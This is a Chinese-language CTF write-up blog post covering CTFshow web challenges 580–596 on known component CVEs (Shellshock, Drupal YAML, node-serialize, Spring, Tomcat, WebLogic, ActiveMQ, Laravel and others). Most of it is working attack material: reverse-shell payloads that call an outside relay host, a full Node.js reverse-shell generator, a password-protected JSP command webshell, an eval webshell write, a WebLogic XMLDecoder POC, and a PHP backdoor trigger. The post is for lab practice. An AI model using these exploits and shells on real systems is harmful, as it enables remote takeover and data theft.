<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><meta name="description" content="CTFshow-web入门-组件漏洞"><meta name="keywords" content="WP"><meta name="author" content="lewiserii"><meta name="copyright" content="lewiserii"><title>CTFshow-web入门-组件漏洞 | lewiserii's blog</title><link rel="shortcut icon" href="/melody-favicon.ico"><link rel="stylesheet" href="/css/index.css?version=1.9.0"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/font-awesome@latest/css/font-awesome.min.css?version=1.9.0"><link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.3.1/css/all.css?version=1.9.0"><meta name="format-detection" content="telephone=no"><meta http-equiv="x-dns-prefetch-control" content="on"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" type="text/css" href="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.css"><script src="https://cdn.jsdelivr.net/npm/instantsearch.js@2.1.1/dist/instantsearch.min.js" defer></script><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><script src="https://v1.hitokoto.cn/?encode=js&amp;charset=utf-8&amp;select=.footer_custom_text" defer></script><script>var GLOBAL_CONFIG = { 
  root: '/',
  algolia: {"appId":"DW60Q1352H","apiKey":"3bb81669fec61a42f77c4a671329f258","indexName":"blog","hits":{"per_page":10},"languages":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}.","hits_stats":"${hits} results found in ${time} ms"}},
  localSearch: undefined,
  copy: {
    success: 'Copy successfully',
    error: 'Copy error',
    noSupport: 'The browser does not support'
  },
  hexoVersion: '5.4.0'
} </script><meta name="generator" content="Hexo 5.4.0"><link rel="alternate" href="/atom.xml" title="lewiserii's blog" type="application/atom+xml">
</head><body><i class="fa fa-arrow-right" id="toggle-sidebar" aria-hidden="true"></i><div id="sidebar" data-display="false"><div class="toggle-sidebar-info text-center"><span data-toggle="Toggle article">Toggle site</span><hr></div><div class="sidebar-toc"><div class="sidebar-toc__title">Catalog</div><div class="sidebar-toc__progress"><span class="progress-notice">You've read</span><span class="progress-num">0</span><span class="progress-percentage">%</span><div class="sidebar-toc__progress-bar"></div></div><div class="sidebar-toc__content"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">1.</span> <span class="toc-text">WEB580</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">2.</span> <span class="toc-text">WEB581</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">3.</span> <span class="toc-text">WEB582</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">4.</span> <span class="toc-text">WEB583</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">5.</span> <span class="toc-text">WEB584</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">6.</span> <span class="toc-text">WEB585</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">7.</span> <span class="toc-text">WEB586</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">8.</span> <span class="toc-text">WEB587</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">9.</span> <span class="toc-text">WEB588</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">10.</span> <span class="toc-text">WEB589</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">11.</span> <span class="toc-text">WEB590</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">12.</span> <span class="toc-text">WEB591</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">13.</span> <span class="toc-text">WEB592</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">14.</span> <span class="toc-text">WEB593</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">15.</span> <span class="toc-text">WEB594</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">16.</span> <span class="toc-text">WEB595</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">17.</span> <span class="toc-text">WEB596</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">18.</span> <span class="toc-text">WEB597</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">19.</span> <span class="toc-text">WEB598</span></a></li><li class="toc-item toc-level-1"><a class="toc-link"><span class="toc-number">20.</span> <span class="toc-text">WEB599</span></a></li></ol></div></div><div class="author-info hide"><div class="author-info__avatar text-center"><img src="https://z3.ax1x.com/2021/06/10/2RAItU.jpg"></div><div class="author-info__name text-center">lewiserii</div><div class="author-info__description text-center"></div><div class="follow-button"><a target="_blank" rel="noopener" href="https://github.com/lewiserii">Follow Me</a></div><hr><div class="author-info-articles"><a class="author-info-articles__archives article-meta" href="/archives"><span class="pull-left">Articles</span><span class="pull-right">7</span></a><a class="author-info-articles__tags article-meta" href="/tags"><span class="pull-left">Tags</span><span class="pull-right">4</span></a><a class="author-info-articles__categories article-meta" href="/categories"><span class="pull-left">Categories</span><span class="pull-right">4</span></a></div><hr><div class="author-info-links"><div class="author-info-links__title text-center">Links</div><a class="author-info-links__name text-center" target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45957793">lewiserii</a></div></div></div><div id="content-outer"><div id="top-container" style="background-image: url(https://z3.ax1x.com/2021/06/12/25MFGd.jpg)"><div id="page-header"><span class="pull-left"> <a id="site-name" href="/">lewiserii's blog</a></span><i class="fa fa-bars toggle-menu pull-right" aria-hidden="true"></i><span class="pull-right menus">   <a class="site-page" href="/">Home</a><a class="site-page" href="/archives">Archives</a><a class="site-page" href="/tags">Tags</a><a class="site-page" href="/categories">Categories</a><a class="site-page" href="/about">About</a></span><span class="pull-right"><a class="site-page social-icon search"><i class="fa fa-search"></i><span> Search</span></a></span></div><div id="post-info"><div id="post-title">CTFshow-web入门-组件漏洞</div><div id="post-meta"><time class="post-meta__date"><i class="fa fa-calendar" aria-hidden="true"></i> 2021-06-18</time><span class="post-meta__separator">|</span><i class="fa fa-inbox post-meta__icon" aria-hidden="true"></i><a class="post-meta__categories" href="/categories/WP/">WP</a><div class="post-meta-wordcount"><span>Word count: </span><span class="word-count">3k</span><span class="post-meta__separator">|</span><span>Reading time: 12 min</span></div></div></div></div><div class="layout" id="content-inner"><article id="post"><div class="article-container" id="post-content"><!-- toc -->

<ul>
<li><a href="#web580">WEB580</a></li>
<li><a href="#web581">WEB581</a></li>
<li><a href="#web582">WEB582</a></li>
<li><a href="#web583">WEB583</a></li>
<li><a href="#web584">WEB584</a></li>
<li><a href="#web585">WEB585</a></li>
<li><a href="#web586">WEB586</a></li>
<li><a href="#web587">WEB587</a></li>
<li><a href="#web588">WEB588</a></li>
<li><a href="#web589">WEB589</a></li>
<li><a href="#web590">WEB590</a></li>
<li><a href="#web591">WEB591</a></li>
<li><a href="#web592">WEB592</a></li>
<li><a href="#web593">WEB593</a></li>
<li><a href="#web594">WEB594</a></li>
<li><a href="#web595">WEB595</a></li>
<li><a href="#web596">WEB596</a></li>
<li><a href="#web597">WEB597</a></li>
<li><a href="#web598">WEB598</a></li>
<li><a href="#web599">WEB599</a></li>
</ul>
<!-- tocstop -->

<p>本篇文章会解释从WEB580–WEB599的做法<br><img src="https://z3.ax1x.com/2021/06/17/2jg9ED.md.png"></p>
<h1><span id="web580">WEB580</span></h1><p>根据题目所给的提示“破壳”，那么应该是Shellshock 破壳漏洞（CVE-2014-6271）<br>这一题试了很多种payload，除了能看/etc/passwd，其他都没有回显或返回500，无奈只能反弹shell（还是太菜了）<br>payload：<br><code>() &#123; :; &#125;; /bin/bash -i &gt;&amp; /dev/tcp/cn1.utools.club/37634 0&gt;&amp;1;</code><br>发送如下数据包</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line">GET /cgi-bin/index.cgi HTTP/1.1</span><br><span class="line">Host: 7f35523e-4939-43d8-8a05-f6348618a843.challenge.ctf.show:8080</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">lewiserii: () &#123; :; &#125;; /bin/bash -i &gt;&amp; /dev/tcp/cn1.utools.club/37634 0&gt;&amp;1;</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Referer: http://7f35523e-4939-43d8-8a05-f6348618a843.challenge.ctf.show:8080/cgi-bin/victim.cgi</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: UM_distinctid=179eb628608d03-066c8283766a21-f7f1939-1bcab9-179eb62860986d</span><br><span class="line">Connection: close</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>拿到shell<br><img src="https://z3.ax1x.com/2021/06/17/2jgSHO.md.png"></p>
<h1><span id="web581">WEB581</span></h1><p>具体可以参考<a target="_blank" rel="noopener" href="https://paper.seebug.org/334/">CVE-2017-6920</a><br>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">content=!php/object O:3:&quot;log&quot;:2:&#123;s:8:&quot;filename&quot;;s:5:&quot;1.php&quot;;s:7:&quot;content&quot;;s:24:&quot;&lt;?php eval($_POST[1]);?&gt;&quot;;&#125;</span><br></pre></td></tr></table></figure>

<p>只要带上!php/object  后面就会进行反序列化<br>写入文件后访问<br><img src="https://z3.ax1x.com/2021/06/17/2jczDK.md.png"></p>
<h1><span id="web582">WEB582</span></h1><p>nodejsshell.py</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line">import sys</span><br><span class="line"></span><br><span class="line">if len(sys.argv) != 3:</span><br><span class="line">    print &quot;Usage: %s &lt;LHOST&gt; &lt;LPORT&gt;&quot; % (sys.argv[0])</span><br><span class="line">    sys.exit(0)</span><br><span class="line"></span><br><span class="line">IP_ADDR = sys.argv[1]</span><br><span class="line">PORT = sys.argv[2]</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">def charencode(string):</span><br><span class="line">    &quot;&quot;&quot;String.CharCode&quot;&quot;&quot;</span><br><span class="line">    encoded = &#x27;&#x27;</span><br><span class="line">    for char in string:</span><br><span class="line">        encoded = encoded + &quot;,&quot; + str(ord(char))</span><br><span class="line">    return encoded[1:]</span><br><span class="line"></span><br><span class="line">print &quot;[+] LHOST = %s&quot; % (IP_ADDR)</span><br><span class="line">print &quot;[+] LPORT = %s&quot; % (PORT)</span><br><span class="line">NODEJS_REV_SHELL = &#x27;&#x27;&#x27;</span><br><span class="line">var net = require(&#x27;net&#x27;);</span><br><span class="line">var spawn = require(&#x27;child_process&#x27;).spawn;</span><br><span class="line">HOST=&quot;%s&quot;;</span><br><span class="line">PORT=&quot;%s&quot;;</span><br><span class="line">TIMEOUT=&quot;5000&quot;;</span><br><span class="line">if (typeof String.prototype.contains === &#x27;undefined&#x27;) &#123; String.prototype.contains = function(it) &#123; return this.indexOf(it) != -1; &#125;; &#125;</span><br><span class="line">function c(HOST,PORT) &#123;</span><br><span class="line">    var client = new net.Socket();</span><br><span class="line">    client.connect(PORT, HOST, function() &#123;</span><br><span class="line">        var sh = spawn(&#x27;/bin/sh&#x27;,[]);</span><br><span class="line">        client.write(&quot;Connected!\\n&quot;);</span><br><span class="line">        client.pipe(sh.stdin);</span><br><span class="line">        sh.stdout.pipe(client);</span><br><span class="line">        sh.stderr.pipe(client);</span><br><span class="line">        sh.on(&#x27;exit&#x27;,function(code,signal)&#123;</span><br><span class="line">          client.end(&quot;Disconnected!\\n&quot;);</span><br><span class="line">        &#125;);</span><br><span class="line">    &#125;);</span><br><span class="line">    client.on(&#x27;error&#x27;, function(e) &#123;</span><br><span class="line">        setTimeout(c(HOST,PORT), TIMEOUT);</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;</span><br><span class="line">c(HOST,PORT);</span><br><span class="line">&#x27;&#x27;&#x27; % (IP_ADDR, PORT)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">print &quot;[+] Encoding&quot;</span><br><span class="line">PAYLOAD = charencode(NODEJS_REV_SHELL)</span><br><span class="line">print &quot;eval(String.fromCharCode(%s))&quot; % (PAYLOAD)</span><br></pre></td></tr></table></figure>
<p>通过nodejsshell.py生成payload<br><img src="https://z3.ax1x.com/2021/06/17/2j7xKg.png"><br>放入<code>&#123;&quot;username&quot;:&quot;_$$ND_FUNC$$_function ()&#123;生成的payload&#125;()&quot;,&quot;password&quot;:123&#125;</code>,然后base64编码加url编码<br>bp抓包，构造一个user并传入payload<br><img src="https://z3.ax1x.com/2021/06/17/2jqIrF.png"><br>成功反弹shell<br><img src="https://z3.ax1x.com/2021/06/17/2jq5KU.png"></p>
<h1><span id="web583">WEB583</span></h1><p>CVE-2016-10033<br>在github上找到了<a target="_blank" rel="noopener" href="https://github.com/opsxcq/exploit-CVE-2016-10033">exp</a><br>直接打就行了<br><img src="https://z3.ax1x.com/2021/06/17/2vpd8H.png"></p>
<p>但是这里有个地方要注意<br>现在（6.17）github上的exp是打不通的<br>我把这个和以前在github上下的版本用beyond比对了一下<br>！ 竟然不一样，如果你用官网的打不通可以试试我这个<a target="_blank" rel="noopener" href="https://pan.baidu.com/s/1PHYAEyRyubLVZw8cc-iscg">版本</a>,提取码是f3rw<br><img src="https://z3.ax1x.com/2021/06/17/2vQT54.png"></p>
<h1><span id="web584">WEB584</span></h1><p>生成数字exp(将echo后的内容替换成你自己的反弹一句话)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">payload = b&#x27;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC9jbjEudXRvb2xzLmNsdWIvNDUyMTQgMD4mMQ==&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&#x27;</span><br><span class="line">bytecode = &#x27;,&#x27;.join(str(i) for i in list(payload))</span><br><span class="line">print(bytecode)</span><br></pre></td></tr></table></figure>

<p>payload</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">[&#123; &quot;op&quot;: &quot;replace&quot;, &quot;path&quot;: &quot;T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]&#123;生成的数字&#125;))/lastname&quot;, &quot;value&quot;: &quot;ctfshow&quot; &#125;]</span><br></pre></td></tr></table></figure>
<p>首先post /api/people新建一个用户,获取到id<br><img src="https://z3.ax1x.com/2021/06/17/2v1vND.png"></p>
<p>然后通过PATCH /api/people/1，可以rce反弹shell<br><strong>注意Content-Type的格式</strong></p>
<p><img src="https://z3.ax1x.com/2021/06/17/2v34qP.png"><br><img src="https://z3.ax1x.com/2021/06/17/2v3hrt.png"></p>
<h1><span id="web585">WEB585</span></h1><p>Tomcat PUT方法任意写文件漏洞（CVE-2017-12615）<br>直接抓包传即可，但是要注意tomcat对文件后缀有一定验证，（不能直接写jsp），但我们使用一些文件系统的特性（如Linux下可用/）来绕过限制。<br><img src="https://z3.ax1x.com/2021/06/17/2vBIZ4.png"></p>
<p>拿到shell<br><img src="https://z3.ax1x.com/2021/06/17/2vB4LF.png"></p>
<p>jsp小马（pwd=023）</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">&lt;%@ page language=&quot;java&quot; import=&quot;java.util.*,java.io.*&quot; pageEncoding=&quot;UTF-8&quot;%&gt;</span><br><span class="line">&lt;%!public static String excuteCmd(String c)</span><br><span class="line">&#123;</span><br><span class="line">    StringBuilder line = new StringBuilder();</span><br><span class="line">try</span><br><span class="line">&#123;</span><br><span class="line">    Process pro = Runtime.getRuntime().exec(c);</span><br><span class="line">    BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));</span><br><span class="line">    String temp = null;</span><br><span class="line">    while ((temp = buf.readLine()) != null)</span><br><span class="line">    &#123;</span><br><span class="line">        line.append(temp+&quot;\\n&quot;);</span><br><span class="line">    &#125;</span><br><span class="line">    buf.close();</span><br><span class="line">&#125;</span><br><span class="line">catch (Exception e)</span><br><span class="line">&#123;</span><br><span class="line">    line.append(e.getMessage());</span><br><span class="line">&#125;</span><br><span class="line">return line.toString();</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br><span class="line">&lt;%</span><br><span class="line">if(&quot;023&quot;.equals(request.getParameter(&quot;pwd&quot;))&amp;&amp;!&quot;&quot;.equals(request.getParameter(&quot;cmd&quot;)))</span><br><span class="line">&#123;</span><br><span class="line">    out.println(&quot;&lt;pre&gt;&quot;+excuteCmd(request.getParameter(&quot;cmd&quot;))+&quot;&lt;/pre&gt;&quot;);</span><br><span class="line">&#125;</span><br><span class="line">else</span><br><span class="line">&#123;</span><br><span class="line">    out.println(&quot;:-)&quot;);</span><br><span class="line">&#125;</span><br><span class="line">%&gt;</span><br></pre></td></tr></table></figure>

<h1><span id="web586">WEB586</span></h1><p>wordpress环境，首先尝试弱口令，进不去，只好创建一个用户进行测试<br>发现里面有一篇文章介绍了这个插件漏洞<br>使用百度，发现对于下面这个地址的id参数（post）存在sql注入，因为没有过滤直接带入了sql语句，所以造成了sql注入<br>IP/wp-admin/admin-ajax.php?action=populate_download_edit_form</p>
<p>我用sqlmap跑出来了，也可以手注（使用load_file读文件）<br><img src="https://z3.ax1x.com/2021/06/17/2vyt0S.png"><br><img src="https://z3.ax1x.com/2021/06/17/2v6PHS.png"></p>
<h1><span id="web587">WEB587</span></h1><p>Weblogic &lt; 10.3.6 ‘wls-wsat’ XMLDecoder 反序列化漏洞（CVE-2017-10271）<br>漏洞使用了XMLDecoder来解析用户传入的XML数据，但在在解析的过程中出现反序列化漏洞，导致可执行任意命令。</p>
<p>发送如下数据包（注意其中反弹shell的语句，需要进行编码，否则解析XML的时候将出现格式错误）：<br><img src="https://z3.ax1x.com/2021/06/17/2vgSw8.png"><br><img src="https://z3.ax1x.com/2021/06/17/2vczef.png"><br>POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line">POST /wls-wsat/CoordinatorPortType HTTP/1.1</span><br><span class="line">Host: e40b731a-4abf-4e0b-acaf-c03997996db7.challenge.ctf.show:8080</span><br><span class="line">Pragma: no-cache</span><br><span class="line">Cache-Control: no-cache</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.106 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9</span><br><span class="line">Referer: http://e40b731a-4abf-4e0b-acaf-c03997996db7.challenge.ctf.show:8080/</span><br><span class="line">Accept-Encoding: gzip, deflate</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9</span><br><span class="line">Cookie: UM_distinctid=179eb628608d03-066c8283766a21-f7f1939-1bcab9-179eb62860986d</span><br><span class="line">Connection: close</span><br><span class="line">Content-Type: text/xml</span><br><span class="line">Content-Length: 641</span><br><span class="line"></span><br><span class="line">&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot;&gt; &lt;soapenv:Header&gt;</span><br><span class="line">&lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;</span><br><span class="line">&lt;java version=&quot;1.4.0&quot; class=&quot;java.beans.XMLDecoder&quot;&gt;</span><br><span class="line">&lt;void class=&quot;java.lang.ProcessBuilder&quot;&gt;</span><br><span class="line">&lt;array class=&quot;java.lang.String&quot; length=&quot;3&quot;&gt;</span><br><span class="line">&lt;void index=&quot;0&quot;&gt;</span><br><span class="line">&lt;string&gt;/bin/bash&lt;/string&gt;</span><br><span class="line">&lt;/void&gt;</span><br><span class="line">&lt;void index=&quot;1&quot;&gt;</span><br><span class="line">&lt;string&gt;-c&lt;/string&gt;</span><br><span class="line">&lt;/void&gt;</span><br><span class="line">&lt;void index=&quot;2&quot;&gt;</span><br><span class="line">&lt;string&gt;bash -i &amp;gt;&amp;amp; /dev/tcp/cn1.utools.club/45214 0&amp;gt;&amp;amp;1&lt;/string&gt;</span><br><span class="line">&lt;/void&gt;</span><br><span class="line">&lt;/array&gt;</span><br><span class="line">&lt;void method=&quot;start&quot;/&gt;&lt;/void&gt;</span><br><span class="line">&lt;/java&gt;</span><br><span class="line">&lt;/work:WorkContext&gt;</span><br><span class="line">&lt;/soapenv:Header&gt;</span><br><span class="line">&lt;soapenv:Body/&gt;</span><br><span class="line">&lt;/soapenv:Envelope&gt;</span><br></pre></td></tr></table></figure>

<h1><span id="web588">WEB588</span></h1><p>吐槽一下：这一题的环境生成的好慢，我还以为环境坏了</p>
<p>Weblogic 任意文件上传漏洞（CVE-2018-2894）<br>利用该漏洞，可以上传任意jsp文件，进而获取服务器权限。</p>
<p>访问IP/ws_utc/config.do，如果进入时不是设置页面而是登陆页面可以刷新一下多试几次</p>
<p>设置Work Home Dir为<code>/u01/oracle/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/com.oracle.webservices.wls.ws-testclient-app-wls/4mcj4y/war/css</code>。我将目录设置为ws_utc应用的静态文件css目录，访问这个目录是无需权限的，这一点很重要。</p>
<p>然后点击安全 -&gt; 增加，然后上传webshell并找到这个文件的时间戳（可以抓包或F12查看）：<br><img src="https://z3.ax1x.com/2021/06/17/2vL8c6.png"></p>
<p>然后访问IP/ws_utc/css/config/keystore/[时间戳]_[文件名]，即可执行webshell(flag在环境变量里)：<br><img src="https://z3.ax1x.com/2021/06/17/2vOdqU.png"></p>
<h1><span id="web589">WEB589</span></h1><p>ActiveMQ任意文件写入漏洞（CVE-2016-3088）</p>
<p>首先访问IP/admin/test/systemProperties.jsp，查看ActiveMQ的绝对路径(账号密码为admin弱口令)：<br><img src="https://z3.ax1x.com/2021/06/17/2vx061.png"></p>
<p>然后PUT方法上传webshell：<br>上传成功后可以访问看一下，发现代码直接显示了，那么就表示没有解析，需要换个目录<br><img src="https://z3.ax1x.com/2021/06/17/2xSxoT.png"></p>
<p>使用MOVE方法移动到web目录下的api文件夹（/opt/activemq/webapps/api/s.jsp）中：<br><img src="https://z3.ax1x.com/2021/06/17/2xpSFU.png"><br><img src="https://z3.ax1x.com/2021/06/17/2xSvwV.png"></p>
<h1><span id="web590">WEB590</span></h1><p>Apereo CAS是一款Apereo发布的集中认证服务平台，常被用于企业内部单点登录系统。其4.1.7版本之前存在一处默认密钥的问题，利用这个默认密钥我们可以构造恶意信息触发目标反序列化漏洞，进而执行任意命令。</p>
<p>使用<a target="_blank" rel="noopener" href="https://github.com/vulhub/Apereo-CAS-Attack/releases">Apereo-CAS-Attack</a>来生成POC<br><img src="https://z3.ax1x.com/2021/06/17/2xPjc4.png"><br>然后我们登录CAS并抓包，将Body中的execution值替换成上面生成的Payload发送<br><img src="https://z3.ax1x.com/2021/06/17/2xPbNV.png"><br><img src="https://z3.ax1x.com/2021/06/17/2xPHA0.png"></p>
<h1><span id="web591">WEB591</span></h1><p>591后面都是福利题了，嘿嘿<br>Apache HTTPD 换行解析漏洞（CVE-2017-15715）<br>在1.php后面插入一个\x0A（注意，不能是\x0D\x0A，只能是一个\x0A）<br><img src="https://z3.ax1x.com/2021/06/17/2xmq4s.png"><br>访问刚才上传的/1.php%0a，发现能够成功解析<br><img src="https://z3.ax1x.com/2021/06/17/2xmbNj.png"></p>
<h1><span id="web592">WEB592</span></h1><p>Apache HTTPD 多后缀解析漏洞</p>
<p>上传的文件中只要包含.php都能被解析<br><img src="https://z3.ax1x.com/2021/06/17/2xQkdO.png"></p>
<p><img src="https://z3.ax1x.com/2021/06/17/2xQAoD.png"></p>
<h1><span id="web593">WEB593</span></h1><p>Apache SSI 远程命令执行漏洞<br>在测试任意文件上传漏洞的时候，目标服务端可能不允许上传php后缀的文件。如果目标服务器开启了SSI与CGI支持，我们可以上传一个shtml文件，并利用<code>&lt;!--#exec cmd=&quot;id&quot; --&gt;</code>语法执行任意命令。</p>
<p>上传一个shtml文件<br><img src="https://z3.ax1x.com/2021/06/17/2x1IRH.png" alt="2x1IRH.png"><br>访问生成的文件<br><img src="https://z3.ax1x.com/2021/06/17/2x15Je.png" alt="2x15Je.png"></p>
<h1><span id="web594">WEB594</span></h1><p>Laravel开启了Debug模式时，由于Laravel自带的Ignition 组件对file_get_contents()和file_put_contents()函数的不安全使用，攻击者可以通过发起恶意请求，构造恶意Log文件等方式触发Phar反序列化，最终造成远程代码执行。<br><a target="_blank" rel="noopener" href="https://github.com/SNCKER/CVE-2021-3129/blob/master/exploit.py">EXP</a><br>运行exp还需要php，python3，linux环境，下载<a target="_blank" rel="noopener" href="https://github.com/ambionics/phpggc">phpggc</a>放在同一级目录下<br>使用时只需要修改exp中的URL和命令即可<br><img src="https://z3.ax1x.com/2021/06/17/2xGi5T.png"></p>
<h1><span id="web595">WEB595</span></h1><p>原型为PHP官方GIT服务器近日被植入的后门。<br>首先，后门程序会检测http头是否含有User-Agentt(不是User-Agent，多了一个t)。<br>如果存在，判断它的值是否含有zerodium字符串，作为触发后门的“口令”。<br>如果标示存在，从User-Agentt值的第8个字节起到结尾提取字符串作为代码（前8个字符为zerodium），进行编译执行，如同eval函数效果。<br>抓包改报文即可执行命令：<br>User-Agentt: zerodiumsystem(‘ls /‘);<br><img src="https://z3.ax1x.com/2021/06/17/2xJvBn.png"></p>
<h1><span id="web596">WEB596</span></h1><p>Python PIL 远程命令执行漏洞（GhostButt ）<br>Python中处理图片的模块PIL（Pillow），因为其内部调用了GhostScript而受到GhostButt漏洞（CVE-2017-8291）的影响，造成远程命令执行漏洞。</p>
<p>可以看到有一个上传页面。正常功能是我们上传一个PNG文件，后端调用PIL加载图片，输出长宽。但我们可以将可执行命令EPS文件后缀改成PNG进行上传，因为后端是根据文件头来判断图片类型，所以无视后缀检查。</p>
